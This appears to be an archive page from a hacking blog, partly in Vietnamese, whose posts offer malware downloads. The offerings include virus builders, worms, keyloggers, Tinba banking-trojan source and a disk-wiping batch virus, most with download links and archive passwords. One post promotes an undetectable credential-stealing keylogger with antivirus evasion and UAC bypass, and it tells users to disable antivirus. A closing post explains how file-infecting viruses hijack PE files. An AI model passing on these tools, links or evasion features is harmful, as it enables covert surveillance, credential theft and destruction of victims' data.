Admin.Troj.Kikzyurarse
Reviewed by 0x000216
on
Sunday, December 16, 2018
Rating: 5
Virus Maker 2000
Kang Asu
Virus Maker 2000
Features
Virus Maker 2000Download
Pass : dohamupretoragean
Regards
Kang Asu
Virus Maker 2000
Reviewed by 0x000216
on
Saturday, August 04, 2018
Rating: 5
Security Worm
Kang Asu
Security Worm
Features
Security WormDownload
Pass : dohamupretoragean
Regards
Kang Asu
Security Worm
Reviewed by 0x000216
on
Monday, July 16, 2018
Rating: 5
Monster Worm
Kang Asu
Monster Worm
Features
A great and professional worm Codded in Visual Basic great for spreading files (Only for Educational Purposes)
Download
Regards
Kang Asu
Monster Worm
Reviewed by 0x000216
on
Tuesday, August 15, 2017
Rating: 5
SHARE LINK TẢI 4 LOẠI KEYLOGGER 2016
Bốn Loại Kelogger bao gồm
1) Anonymous Keylogger
2) Dracula Logger
3) Instalador V2
4) Vulcan Logger
scan virus
DOWNLOAD HERE
1) Anonymous Keylogger
2) Dracula Logger
3) Instalador V2
4) Vulcan Logger
scan virus
DOWNLOAD HERE
SHARE LINK TẢI 4 LOẠI KEYLOGGER 2016
Reviewed by 0x000216
on
Sunday, May 08, 2016
Rating: 5
Tiny banker aka Tinba Source - Trojan Banker
Obs. I am not responsible for their actions, test in the virtual machine for not damage your real system.
Tinba got its name from its extraordinarily small size – its code is approximately 20 kilobytes in size, a remarkably small number for banking malware. Tinba is a combination of the words tiny and banker; the same malware is also known as Tinybanker and Zusy.
The program encrypted with pass code and key file to security
Pass: offensivesec
Tiny banker aka Tinba Source - Trojan Banker
Reviewed by 0x000216
on
Tuesday, April 05, 2016
Rating: 5
Cyber Virus
Cyber Virus
Không sử dụng trong máy tính của bạn!
Tính năng Exe:
Định dạng Tất cả Đĩa
Tính năng .bat:
không có Internet
Định dạng đĩa
Đừng Khởi động Windows
...
"Trước khi sử dụng Destroy.txt bạn cần phải chuyển đổi để Destroy.bat "
Cyber Virus
Reviewed by 0x000216
on
Sunday, February 07, 2016
Rating: 5
KEYLOGGER CHO MACBOOK – ĐÃ THỬ NGHIỆM RẤT TUYỆT VỜI
Download tại đây: RefogKeylogger
Tên con Keylogger đầy đủ là RefogKeylogger.
RefogKeylogger là một chương trình gián điệp, ghi lại thông tin bàn phím và ảnh chụp màng hình của nạn nhân tới hacker thông qua một sever theo một chu kì nhất định. Việc đơn giản của RefogKeylogger chỉ có thể. Nó không thể nào so sánh được các loại Trojan như Spynet hoặcDarkcomet RAT được.
Và vì thế nó cũng vô cùng đơn giản để loại trừ . RefogKeylogger rất dễ phát hiện bởi các chương trình quét Virus sơ cấp.
Tuy nhiên VIETLQ.COM không khuyến khích các bạn sử dụng RefogKeylogger làm việc không tốt. RefogKeylogger phát triển dựa trên việc phụ huynh giám sát con cái mình sử dụng máy tính (Macbook).
Mọi việc bạn sử dụng RefogKeylogger để làm gì tôi không có quyền can thiệp, và tôi cũng không chịu trách nhiệm nếu bạn gây hại tới người khác hay xâm phạm đến pháp luật.
Ưu và nhược điểm:
Phần mềm này có trả phí, tuy nhiên bạn cũng không cần mua mà vẫn sử dụng được các chức năng cơ bản của nó. Nếu hết hạn, RefogKeylogger sẽ bị hạn chế một số chức năng.
Không gửi được vào mail. Chỉ thực hiện chức năng giám sát trên một máy.
Việc sử dụng rất dễ, bạn chỉ cần tải về, cài đặt vào máy là xong.
Một vài hình ảnh RefogKeylogger cho các bạn:
Have fun!
KEYLOGGER CHO MACBOOK – ĐÃ THỬ NGHIỆM RẤT TUYỆT VỜI
Reviewed by 0x000216
on
Saturday, October 24, 2015
Rating: 5
Keylogger HOT nhất Hiện nay
Result: (0/60)
A-Squared(Emisoft AntiMalware) Clean - Nothing Found
Agnitum Clean - Nothing Found
AhnLab V3 Internet Security Clean - Nothing Found
ArcaVir Clean - Nothing Found
Avast Clean - Nothing Found
Avg Clean - Nothing Found
Avira Clean - Nothing Found
Ad-Aware Clean - Nothing Found
Baidu AV Clean - Nothing Found
BitDefender Clean - Nothing Found
BKav Clean - Nothing Found
BullGuard Internet Security Clean - Nothing Found
ByteHero Clean - Nothing Found
ClamAv Clean - Nothing Found
Comodo Clean - Nothing Found
Dr. Web Clean - Nothing Found
eScan Clean - Nothing Found
eTrust-Vet Clean - Nothing Found
eScan Internet Security Suite 14 Clean - Nothing Found
ESET NOD32 Clean - Nothing Found
Fortinet Clean - Nothing Found
Fprot Clean - Nothing Found
FSB Antivirus Clean - Nothing Found
F-Secure Clean - Nothing Found
Gdata Clean - Nothing Found
Ikarus Clean - Nothing Found
Immunet Antivirus Clean - Nothing Found
IObit Malware Fighter Clean - Nothing Found
K7Ultimate Clean - Nothing Found
Kaspersky Internet Security 2013 Clean - Nothing Found
KingSoft Clean - Nothing Found
Malwarebytes Anti-Malware Clean - Nothing Found
mcafee Clean - Nothing Found
Microsoft Security Essentials Clean - Nothing Found
nProtect Clean - Nothing Found
NANO Antivirus Clean - Nothing Found
Netgate Clean - Nothing Found
Norton Internet Security Clean - Nothing Found
Norman Clean - Nothing Found
Outpost Security Suite Pro Clean - Nothing Found
Ozone AV Clean - Nothing Found
Panda Antivirus Clean - Nothing Found
Panda Cloud Clean - Nothing Found
PC Tools Clean - Nothing Found
Quick Heal Clean - Nothing Found
SUPERAntiSpyware Clean - Nothing Found
Solo Clean - Nothing Found
Sophos Clean - Nothing Found
TotalDefense Clean - Nothing Found
Trendmicro Internet Security Clean - Nothing Found
TrustPort Antivirus 2014 Clean - Nothing Found
Twister Antivirus 8 Clean - Nothing Found
Unthreat AntiVirus BE Clean - Nothing Found
Vba 32 Clean - Nothing Found
Vexira Clean - Nothing Found
Vipre Internet Security 2013 Clean - Nothing Found
VirIT Clean - Nothing Found
Webroot Clean - Nothing Found
Zillya Clean - Nothing Found
Zoner Clean - Nothing Found
360 Clean - Nothing Found
Filename: eqawe.exe
File MD5 Hash: 4da845e096a139ea240a90e344694928
File SHA1: 2f487abaa5fb17da21af597783ba275c3ed7927e
File Size: 216576 Bytes
Time Scanned: 4-11-14, 04:23:30
Scan provided by RazorScanner
Link to Scan: http://razorscanner.com/result.php?id=629806
Features
[+] %100 FUD
[+] .NET 2.0
[+] server~200kb
[+] Auto Update
[+] Save Options
[+] SMTP
[+] HTML Log
[+] Save Log: It can save logs without internet connection. When internet connected it can send collected logs with subject "Saved Log"
[+] Keyboard Hook (All characters)
[+] Clipboard Hook
[+] On-screen Keyboard Hook
[+] Screenshot
[Assembly]
[+] Assembly Changer
[+] Assembly Cloner
[+] Icon Changer
[Stealer]
[+] Chrome
[+] IExplorer
[+] Firefox
[+] Opera
[+] FileZilla
[+] IMVU
[+] Pidgin
[+] FlashFXP
[+] SmartFTP
[+] CoreFTP
[+] FTPCom
[+] NO-IP
[+] Paltalk
[+] DynDNS
[+] Yahoo
[+] MSN
[+] Steam
[+] JDownloader
[File Binder]
[+] Multi File Binder
[+] All Extension
[+] "Just one time" Option
[Installation]
[+] Injection (RunPE)
[+] Add Startup (hide from msconfig) (Bypass UAC)
[+] Hide File
[+] Persistance
[+] Melt File
[+] Delay Execution
[+] Kill Process
[Options]
[+] Block Anti-Viruses
[+] Protected Process (Bypass UAC)
[+] Block Rightclick (Bypass UAC)
[+] Kill Taskmanager
[+] Kill CMD
[+] Kill Regedit
[+] Kill System Restore
[+] Disable Taskmanager
[+] Disable CMD
[+] Disable Run
[+] Disable Registry
[+] Disable System Restore
[+] Disable Control Panel
[+] Disable MSConfig
[+] Disable Folder Options
[+] Downloader
[+] File Pumper
[+] Extension Spoofer
[Fake Message]
[+] Header
[+] Message
[+] Style
[+] Button
[Web Options]
[+] Host Edit
[+] Web Filter (Bypass UAC)
[+] Add UAC Manifest
username: beta
password: beta
Download: http://db.orangedox.com/CKNPBUs6w9c8uf0G...eta%5D.zip
Zip password: agenttesla
P.S.1: Please close all AV!
P.S.2: Please dont use Virustotal, jotti etc...
Latest Version v2.4.7
-Changed function of melt file. %100 work.
-Stub %100 Fully Undetectable (FUD)
Keylogger HOT nhất Hiện nay
Reviewed by 0x000216
on
Friday, October 16, 2015
Rating: 5
Share KEYLOGGER mới crack free 100%
Tôi cung cấp cho bạn The Best Keylogger Full Version có ngày hôm nay! Với tài năng này, bạn có bằng chứng có thể biết chính xác là đang xảy ra trên máy tính của bạn mà không cần thậm chí bạn có được ở đó. Bạn có thể gửi tất cả những phẩm chất để email của bạn hoặc địa chỉ ftp. Bạn thậm chí có thể tuôn ra tất cả những phẩm chất để tham vọng USB của bạn một khi chèn vào. Các pháo đài keylogger tốt nhất ở chế độ ẩn và hoàn toàn vô hình trên tính toán của bạn:3
DOWLOAD :
http://kiwi6.com/file/5e7rjsjdgr?autostart&utm_campaign=hotlink&utm_source=http%3A%2F%2Fadfoc.us%2Fx35627738&utm_medium=redirectext&utm_content=5e7rjsjdgr
DOWLOAD :
http://kiwi6.com/file/5e7rjsjdgr?autostart&utm_campaign=hotlink&utm_source=http%3A%2F%2Fadfoc.us%2Fx35627738&utm_medium=redirectext&utm_content=5e7rjsjdgr
Share KEYLOGGER mới crack free 100%
Reviewed by 0x000216
on
Tuesday, September 29, 2015
Rating: 5
Cơ chế lây file của virus sử dụng kỹ thuật delta
- Giúp người đọc hiểu được sâu hơn về cơ chế cũng như kỹ thuật lây file của virus lây file để phục vụ trong quá trình phân tích, bóc tách và gỡ bỏ virus.
1. Các kiến thức yêu cầu khi đọc bài viết:
- Kiến thức về kiến trúc máy tính.
- Ngôn ngữ assembly.
- Cấu trúc file PE.
- Windows API
2. Các thuật ngữ sử dụng trong bài viết
- File host: là file sạch chưa bị nhiễm virus
- Code virus: đoạn chương trình của virus.
- EntryPoint: là câu lệnh đầu tiên được thực thi của 1 chương trình.
- API: là các hàm trong các thư viện chuẩn của windows
II. Giới thiệu về PE file.
1. Định nghĩa:
- PE (Portable Executable) là định dạng riêng của hệ điều hành windows. Hầu hết các file thực thi trên Windows đều thuộc dạng PE (Trừ các tập tin VxDs và các file DLL 16 bits).
- Các file thực thi phổ biến nhất là trên hệ điều hành Windows có đuôi mở rộng: .com, .exe, .dll, .pif, .sys...
2. Cấu trúc file PE
- Cấu trúc file PE khá phức tạp. Để tìm hiểu chi tiết về cấu trúc của PE file, các bạn có thể tìm đọc tài liệu tại: “http://win32assembly.programminghori...m/pe-tut1.html”
III. Nguyên lý cơ bản để viết virus lây file.
1. Định nghĩa Virus lây file:
- Định nghĩa: là những file chứa mã độc có hành vi chèn mã thực thi vào các file PE.
- Đặc điểm: Virus lây file không tồn tại ở một file độc lập mà gắn vào chương trình khác trên máy, khiến người dùng khó phát hiện ra chúng và kể cả khi phát hiện cũng không thể xóa file virus đi được vì như thế là xóa luôn chương trình gốc ban đầu.
- Khó khăn khi xử lý: Khi bị nhiễm virus, người dùng thường nghĩ cài lại win sẽ hết nhưng khi gặp virus file, dù có cài lại win xong (thường sẽ format ổ cài win) khi ta chạy file bị nhiễm ở ổ khác virus sẽ lại lây lại vào toàn bộ hệ thống.
2. Các nguyên lý cơ bản
- Đây là các bước cơ bản mà virus cần phải thực hiện khi muốn lây nhiễm vào một chương trình khác.
- Chèn code virus vào file muốn lây nhiễm.
- Chuyển EntryPoint (địa chỉ lệnh đầu tiên của file được thực hiện) đến vùng code thực thi của virus.
- Sau khi thực thi code virus xong sẽ trả quyền điều khiển về cho host (file gốc).
Đây là các kỹ thuật cơ bản mà virus lây file sẽ sử dụng trong quá trình thực thi:
- Sửa header của file host:
Sau khi thêm mã thực thi của mình vào file host thì lúc này các thông tin trong header vẫn là của file host, virus sẽ sửa lại một số giá trị trong header cho phù hợp với file sau khi được chèn thêm đoạn mã của virus. - Kỹ thuật delta:
Khi mã virus được chèn vào file host, các thông tin về địa chỉ của mã virus sai lệch một khoảng nào đó tùy từng file host. Kỹ thuật delta là kỹ thuật dùng để xác định độ sai lệch đó.
- Kỹ thuật lấy địa chỉ các hàm API:
Các thư viện và các hàm API mà virus muốn dùng chưa chắc đã có trong bảng import của file host. Trong trường hợp đó, trình loader sẽ không load sẵn các thư viện đó lên bộ nhớ, do đó virus sẽ phải tự mình đi load các thư viện và tìm các hàm API mà mình muốn dùng.
- Kỹ thuật trả lại quyền điều khiển chương trình về cho host:
Sau khi thực hiện xong các đoạn code của mình thì virus sẽ phải trả lại quyền thực thi cho các file host để tránh bị người dùng nghi ngờ.
IV. Hướng dẫn chi tiết các kỹ thuật.
1. Kỹ thuật delta.
- Kỹ thuật delta mục đích là tính ra khoảng cách từ code virus tới đầu file và lưu trữ lại khoảng cách đó. Sau đó tất cả các câu lệnh truy suất tới các địa chỉ trong code virus chỉ cần dùng khoảng cách đó cộng với địa chỉ tương đối của bộ nhớ cần truy suất tới đầu code virus thêm vào là có thể tính ra địa chỉ thực sự trên bộ nhớ.
- Từ bây giờ muốn truy suất tới một biến trong vùng nhớ ta chỉ việc cộng địa chỉ biến với ebp.
2. Kỹ thuật lấy địa chỉ hàm API.
- Khi bắt đầu được thực thi, gần như virus chưa có trong tay bất kỳ thư viện hay hàm API nào đi cùng. Công việc khó khăn là nó sẽ phải load được các thư viện mình cần lên bộ nhớ và tìm được địa chỉ các hàm API cần thiết sẽ sử dụng.
- Để thực hiện được mục đích trên, virus thường sử dụng 2 hàm đó là: LoadLibrary để load thư viện và GetProcAddress để lấy địa chỉ các hàm trong thư viện đó.
- Câu hỏi khác lại đặt ra: Làm sao để gọi được 2 hàm trên? Có một điều may mắn là cả 2 hàm trên đều nằm trong thư viện kernel32.dll. Thư viện này luôn được load lên cùng file do đó có thể đi tìm địa chỉ của kernel32.dll trên bộ nhớ sau đó sẽ đi tìm 2 hàm quan trọng kia.
- Lý thuyết là vậy nhưng thực tế ta chỉ tìm hàm GetProcAddress là có thể lấy được hàm LoadLibrary.
Cụ thể ta có thể làm như sau:
- Lúc này ta đã có được Handle của kernel32.dll và địa chỉ hàm GetProcAddress. Các công việc còn lại có vẻ đã đơn giả đi nhiều.
Giờ đây muốn lấy thư viện hay thêm hàm nào thì phụ thuộc vào mục đích của virus.
Chú ý: trong đoạn code trên có sử dụng kỹ thuật tìm địa chỉ kernel32.dll dựa trên cấu trúc PEB (Process Environment Block), cấu trúc PE file và cấu trúc bảng Export của PE file.
- Bạn có thể tìm hiểu về PEB tại địa chỉ: http://en.wikipedia.org/wiki/Process_Environment_Block
- Ngoài ra bạn cũng có thể tìm địa chỉ thư viện kernel32.dll dựa vào địa chỉ trả về của Windows loader - đỉnh stack lúc đó chính là một vùng nhớ trong kernel32.dll.
3. Sửa lại Header của file.
Chúng ta sẽ nhìn nhận lại xem các trường nào của PE header sẽ cần phải được sửa lại.
- Đầu tiên sẽ là SizeOfImage : Kích thước của file đã tăng lên do đó trường này cũng sẽ phải thay đổi cho phù hợp.
- Số lượng section: Nếu virus thêm một section vào cuối file thì phải thêm vào bảng section table một section tương ứng và tăng số lượng section trong trường NumberOfSections.
- Sửa lại EntryPoint: Sửa lại Entrypoint trỏ đến lệnh đầu tiên của virus, để virus có thể thực thi mỗi khi phải host được thực thi. Trước khi sửa virus phải lưu lại giá trị Entrypoint gốc của trường trình để khi virus thực thi xong sẽ trả lại quyền điều khiển cho chương trình host.
Đoạn code sửa lại một số trường trong PE Header.
Duyệt tìm file để lây nhiễm sử dụng hai API: FindFirstFile và FindNextFile
Trả quyền điều khiển cho chương trình host
Với cớ chế lây của virus đã nêu ở trên. Chúng ta có thể rút ra được cơ chế để viết 1 chương trình diệt virus lây file như sau:
- B1: Khôi phục lại code gốc của file host nếu bị virus mã hóa
- B2: Khôi phục lại Entrypoint trỏ vể chương trình của file host
- B3: Cắt bỏ phần virus.
- B4: Khôi phục lại các trường quan trọng của PE Header.
VI.Tổng kết
- Trên đây là kỹ thuật của virus khi lây file. Bài viết chỉ mang tính chất giới thiệu cơ chế cũng như các kỹ thuật của virus lây file để giúp người đọc hiểu hơn về virus và có thể tự phân tích và viết chương trình gỡ bỏ virus khi máy bị lây nhiễm.
- Các trường hợp nếu người đọc sử dụng kiến thức trong bài viết vào mục đích xấu phải chịu hoàn toàn trách nhiệm và thiệt hại đã gây ra.
Cơ chế lây file của virus sử dụng kỹ thuật delta
Reviewed by 0x000216
on
Monday, August 24, 2015
Rating: 5